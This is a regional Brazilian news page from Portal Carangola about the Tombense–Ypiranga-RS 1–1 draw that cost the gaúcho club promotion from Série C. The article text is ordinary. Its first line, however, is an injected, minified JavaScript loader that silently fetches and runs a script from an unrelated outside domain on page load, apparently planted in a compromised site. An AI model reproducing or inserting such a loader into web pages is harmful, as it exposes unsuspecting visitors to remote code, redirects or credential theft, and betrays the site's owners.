;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense e Ypiranga-RS empatam, e time gaúcho fica sem acesso na Série C do Brasileiro. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense e Ypiranga-RS empatam, e time gaúcho fica sem acesso na Série C do Brasileiro.

Jogando em Tombos na tarde deste Sábado, Tombense e Ypiranga-RS ficaram no empate em 1 a 1, no Almeidão, em jogo válido pela última rodada do Grupo D da Série C do Campeonato Brasileiro. Ruim para o time gaúcho, que ficou sem o acesso para a Série B. Indiferente para o Tombense, que vai buscar o título do campeonato diante do Ituano, em dois jogos. Marquinhos, no primeiro minuto de jogo, abriu o placar para o Carcará. Jonathan, aos 24 do segundo tempo, empatou.

O Tombense agora virá a chave para as finais da Série C contra a forte equipe do Ituano do interior paulista com jogos de ida e volta, e no próximo domingo em Tomboa já acontece a primeira partida válida pela decisão.